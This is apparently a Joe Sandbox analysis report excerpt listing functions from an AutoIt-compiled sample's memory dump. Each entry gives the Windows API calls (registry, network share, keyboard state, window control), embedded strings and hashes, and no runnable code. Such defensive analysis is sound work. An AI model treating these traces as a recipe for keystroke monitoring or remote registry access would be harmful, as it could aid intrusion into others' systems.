                                                                                                          • Opcode ID: 9ba39b737d5171814cdd53ac4c5b3fb178231f88a21bc6290bacfca268196bd9
                                                                                                          • Instruction ID: 9bb45ee717a680ab94d6726a66b629c645c8859a346b2524694538a039d7a128
                                                                                                          • Opcode Fuzzy Hash: 9ba39b737d5171814cdd53ac4c5b3fb178231f88a21bc6290bacfca268196bd9
                                                                                                          • Instruction Fuzzy Hash: B651EF702083049FC714EF14D892AABB7E5EF99344F14682DF5917B2E2EB30ED09CA42
                                                                                                          Function 00E983FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          • _memset.LIBCMT ref: 00E98489
                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E984BE
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E984DA
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E984F6
                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E98520
                                                                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00E98548
                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E98553
                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E98558
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                          • API String ID: 1411258926-22481851
                                                                                                          • Opcode ID: 8059884ad7ee803508c16510ac19f023d11ed8dd6e175447b236b1e4e6ed3807
                                                                                                          • Instruction ID: df2231474dc4049539dfc47610de3ce0fce14e0d8a247770455626f3fcaf4227
                                                                                                          • Opcode Fuzzy Hash: 8059884ad7ee803508c16510ac19f023d11ed8dd6e175447b236b1e4e6ed3807
                                                                                                          • Instruction Fuzzy Hash: B9411872C1022DABCF15EBA4DC95EEDB7B8FF04341F04556AE915B2161EB309E08CB90
                                                                                                          Function 00EC147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EC040D,?,?), ref: 00EC1491
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper
                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                          • API String ID: 3964851224-909552448
                                                                                                          • Opcode ID: d4ec740ebccf9ff2911a651336a774c0210d47aa089f45da44689f1c2b001f72
                                                                                                          • Instruction ID: a69843433bd9c8398231f95b8867c2af3677a2f1294aea1fdcc62932a203c4c6
                                                                                                          • Opcode Fuzzy Hash: d4ec740ebccf9ff2911a651336a774c0210d47aa089f45da44689f1c2b001f72
                                                                                                          • Instruction Fuzzy Hash: B9414D3054025E9BCF04EF50EA51BEA3764BF92344F606599FC5277292DB32ED1ACB50
                                                                                                          Function 00EA5882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                            • Part of subcall function 00E5153B: _memmove.LIBCMT ref: 00E515C4
                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EA58EB
                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EA5901
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EA5912
                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EA5924
                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EA5935
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$_memmove
                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                          • API String ID: 2279737902-1007645807
                                                                                                          • Opcode ID: 18cec26b7dca3aab3a55a46c02396749b2a239b7159934a4b16fdb7867f07501
                                                                                                          • Instruction ID: 8418e2840dd62551f07c67b0b60a30309eb66f00f9443df7e57567e4aeae2343
                                                                                                          • Opcode Fuzzy Hash: 18cec26b7dca3aab3a55a46c02396749b2a239b7159934a4b16fdb7867f07501
                                                                                                          • Instruction Fuzzy Hash: 6B11C83198121DF9D720A765DC4AEFF7BBCEBD6B50F4018697911BA0D0EEA01D08C5A0
                                                                                                          Function 00EA4C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                          • String ID: 0.0.0.0
                                                                                                          • API String ID: 208665112-3771769585
                                                                                                          • Opcode ID: 3ff1de33b9a9dad718f0c36e7e2dea78e1cc648c0a1ffd807ccdea43a6bba5e0
                                                                                                          • Instruction ID: 203e58fdacefdf2f7cdf961d54b65a9d7d9f73f4792c1a5550c2e460b98a9469
                                                                                                          • Opcode Fuzzy Hash: 3ff1de33b9a9dad718f0c36e7e2dea78e1cc648c0a1ffd807ccdea43a6bba5e0
                                                                                                          • Instruction Fuzzy Hash: 25116D71505108AFDB15B720AC49EDEBBFCDF85720F0811A6F048BA1D1EFB0A9818A50
                                                                                                          Function 00EA5530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • timeGetTime.WINMM ref: 00EA5535
                                                                                                            • Part of subcall function 00E6083E: timeGetTime.WINMM(?,00000002,00E4C22C), ref: 00E60842
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00EA5561
                                                                                                          • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00EA5585
                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00EA55A7
                                                                                                          • SetActiveWindow.USER32 ref: 00EA55C6
                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EA55D4
                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EA55F3
                                                                                                          • Sleep.KERNEL32(000000FA), ref: 00EA55FE
                                                                                                          • IsWindow.USER32 ref: 00EA560A
                                                                                                          • EndDialog.USER32(00000000), ref: 00EA561B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                          • String ID: BUTTON
                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                          • Opcode ID: 34a8aa7666b6416263ebd75db5dd0d5815dbf8a0e633783dee4df602225c3c46
                                                                                                          • Instruction ID: 43c258826c70e4321e46e00a2dc11bef92bd847fc12b83f4b86aa530d14f6c5e
                                                                                                          • Opcode Fuzzy Hash: 34a8aa7666b6416263ebd75db5dd0d5815dbf8a0e633783dee4df602225c3c46
                                                                                                          • Instruction Fuzzy Hash: 5721D171605608AFEB405B61FC89B3A3B6AFB8A394F082419F401A91A1CF71AC54EB35
                                                                                                          Function 00EADBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EADC2D
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EADCC0
                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00EADCD4
                                                                                                          • CoCreateInstance.OLE32(00ED3D4C,00000000,00000001,00EFB86C,?), ref: 00EADD20
                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EADD8F
                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 00EADDE7
                                                                                                          • _memset.LIBCMT ref: 00EADE24
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00EADE60
                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EADE83
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00EADE8A
                                                                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EADEC1
                                                                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 00EADEC3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1246142700-0
                                                                                                          • Opcode ID: a18f4e774b0eb4583885cfd543cfdfb2849fdcb06770b6808b9286e4d8b00348
                                                                                                          • Instruction ID: 6326152c9002478d1e26c81bcbb0a3679f2f0265d1dd4c34b92aed0d6c59f17e
                                                                                                          • Opcode Fuzzy Hash: a18f4e774b0eb4583885cfd543cfdfb2849fdcb06770b6808b9286e4d8b00348
                                                                                                          • Instruction Fuzzy Hash: 0EB1E975A00109AFDB04DFA4D888EAEBBF9FF49314F149499E906EB261DB30ED45CB50
                                                                                                          Function 00EA081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 00EA0896
                                                                                                          • SetKeyboardState.USER32(?), ref: 00EA0901
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00EA0921
                                                                                                          • GetKeyState.USER32(000000A0), ref: 00EA0938
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00EA0967
                                                                                                          • GetKeyState.USER32(000000A1), ref: 00EA0978
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00EA09A4
                                                                                                          • GetKeyState.USER32(00000011), ref: 00EA09B2
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00EA09DB
                                                                                                          • GetKeyState.USER32(00000012), ref: 00EA09E9
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00EA0A12
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00EA0A20
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: 5f88f46b89472bca872215bfebcb90d274dc48bdedcc5cc8890cc424f24425cb
                                                                                                          • Instruction ID: a74f03cbd5f0e5837497fef4c8930e9653f15d0ccded0d5cc525e7f41fe48466
                                                                                                          • Opcode Fuzzy Hash: 5f88f46b89472bca872215bfebcb90d274dc48bdedcc5cc8890cc424f24425cb
                                                                                                          • Instruction Fuzzy Hash: A751A734A0478429FB35DBA044117AABFF49F4B384F0855DA95C26F1C3DA64BA4CCBA5
                                                                                                          Function 00E9CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00E9CE1C
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00E9CE2E
                                                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E9CE8C
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00E9CE97
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00E9CEA9
                                                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E9CEFD
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00E9CF0B
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00E9CF1C
                                                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E9CF5F
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00E9CF6D
                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E9CF8A
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E9CF97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3096461208-0
                                                                                                          • Opcode ID: 20513abf1e0a37ee5a48eb928c03c094f50481d164ece4afd6b1e916e065ff1c
                                                                                                          • Instruction ID: 1e1540d69c63ffbb5114c3ab1bebee135be0f7854b5ad85813878b27ddd96390
                                                                                                          • Opcode Fuzzy Hash: 20513abf1e0a37ee5a48eb928c03c094f50481d164ece4afd6b1e916e065ff1c
                                                                                                          • Instruction Fuzzy Hash: 73512F71B00205AFDF18DF69DD99BAEBBBAEB88710F14812DF516E7290D770AD048B50
                                                                                                          Function 00E42581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429AB: GetWindowLongW.USER32(?,000000EB), ref: 00E429BC
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00E425AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ColorLongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 259745315-0
                                                                                                          • Opcode ID: 167be4ef361403a99d14b84fb18cc136f1d7c4d5a64de28d1965729708770a15
                                                                                                          • Instruction ID: c3267e0cce64d5763599b030c8f0479f173568d4412ee842ff152efcb251bab0
                                                                                                          • Opcode Fuzzy Hash: 167be4ef361403a99d14b84fb18cc136f1d7c4d5a64de28d1965729708770a15
                                                                                                          • Instruction Fuzzy Hash: 4141E9301015409FDB205F68FC88BB93766FB0A335F5A52A9FE65AE1E2C7308D41DB21
                                                                                                          Function 00E529BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E60B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E52A3E,?,00008000), ref: 00E60BA7
                                                                                                            • Part of subcall function 00E60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E52A58,?,00008000), ref: 00E602A4
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E52ADF
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E52C2C
                                                                                                            • Part of subcall function 00E53EBE: _wcscpy.LIBCMT ref: 00E53EF6
                                                                                                            • Part of subcall function 00E6386D: _iswctype.LIBCMT ref: 00E63875
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                          • API String ID: 537147316-3738523708
                                                                                                          • Opcode ID: 8ddfac9add9c106bfff1ad22dcdf0998b71edf6a91f7f49d816017830d5189a0
                                                                                                          • Instruction ID: 40e0c6d20907043f8f044a2370ba289683da080b7ba79cbdc0df27ba4037fd07
                                                                                                          • Opcode Fuzzy Hash: 8ddfac9add9c106bfff1ad22dcdf0998b71edf6a91f7f49d816017830d5189a0
                                                                                                          • Instruction Fuzzy Hash: 4002C0301083419FC724EF24C841AAFBBE5EF89355F142D1DF999A72A2DB30DA49CB42
                                                                                                          Function 00E44D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __i64tow__itow__swprintf
                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                          • API String ID: 421087845-2263619337
                                                                                                          • Opcode ID: 6170239d87c97f26713b35d2cf0ffc9030db995a8318d6ee41f045e4b25558bd
                                                                                                          • Instruction ID: 2554e0f062314db9e0bfe71573beefe610da7eeb4c1d00d3e25ee8956a949757
                                                                                                          • Opcode Fuzzy Hash: 6170239d87c97f26713b35d2cf0ffc9030db995a8318d6ee41f045e4b25558bd
                                                                                                          • Instruction Fuzzy Hash: 6A41D171A48209AADB24DF34ED42FBA73F8EF44344F20646EE549F7292EA319901CB11
                                                                                                          Function 00EC7777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EC778F
                                                                                                          • CreateMenu.USER32 ref: 00EC77AA
                                                                                                          • SetMenu.USER32(?,00000000), ref: 00EC77B9
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC7846
                                                                                                          • IsMenu.USER32(?), ref: 00EC785C
                                                                                                          • CreatePopupMenu.USER32 ref: 00EC7866
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC7893
                                                                                                          • DrawMenuBar.USER32 ref: 00EC789B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                          • String ID: 0$F
                                                                                                          • API String ID: 176399719-3044882817
                                                                                                          • Opcode ID: 5475dd5e89d2ca602514c2e86a4fec78cede284977bb83834638707b28303227
                                                                                                          • Instruction ID: 0586fdd0202046765ab7b62b38259d30cc015a8557be3d4d7aa2a203df2c874b
                                                                                                          • Opcode Fuzzy Hash: 5475dd5e89d2ca602514c2e86a4fec78cede284977bb83834638707b28303227
                                                                                                          • Instruction Fuzzy Hash: DE414575A01209EFDB20DF65E988F9ABBF5FF48310F184069EA85A7360C731A925DF50
                                                                                                          Function 00EC7AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EC7B83
                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00EC7B8A
                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EC7B9D
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00EC7BA5
                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EC7BB0
                                                                                                          • DeleteDC.GDI32(00000000), ref: 00EC7BB9
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00EC7BC3
                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EC7BD7
